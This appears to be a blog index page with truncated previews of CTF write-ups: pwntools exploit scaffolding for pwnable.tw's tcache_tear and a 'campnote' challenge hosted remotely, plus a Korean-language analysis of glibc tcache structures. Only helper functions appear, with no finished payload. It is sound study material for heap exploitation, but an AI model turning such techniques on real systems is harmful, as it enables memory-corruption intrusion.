youngsouk
youngsouk
[pwnable.tw] tcache_tear
import sys from pwn import * if len(sys.argv) != 2: print "sys.argv[1] = r : remotel : local" exit() context.log_level = 'debug' def malloc(size, Data): sleep(0.3) #p.recv() p.send('1') #p.sendafter('Your choice :', '1') sleep(0.3) #p.recv() p.send(str(size)) #p.sendafter('size', str(size)) sleep(0.3) #p.recv() p.send(str(Data)) #p.sendafter('Data:', str(Data)) def free(): sleep(0.3) p.send('2')..
[hackingcamp2019]
from pwn import * #p = process('./campnote') p = remote("pwnable.shop", 20202) e = ELF('./campnote') l = e.libc context.log_level="debug" def malloc(size, content): p.sendlineafter('>>','1') p.sendlineafter('size >> ',str(size)) p.sendlineafter('data >> ',str(content)) def free(index): p.sendlineafter('>>','2') p.sendlineafter('index >> ', str(index)) def show(index): p.sendlineafter('>>','3') p..
tcache 분석
/* We overlay this structure on the user-data portion of a chunk when the chunk is stored in the per-thread cache. */ typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; tcache_entry 구조체의 모습이다. next라는 이름의 포인터밖에 없다. /* There is one of these for each thread, which contains the per-thread cache (hence "tcache_perthread_struct"). Keeping overall size low is mildly important. Not..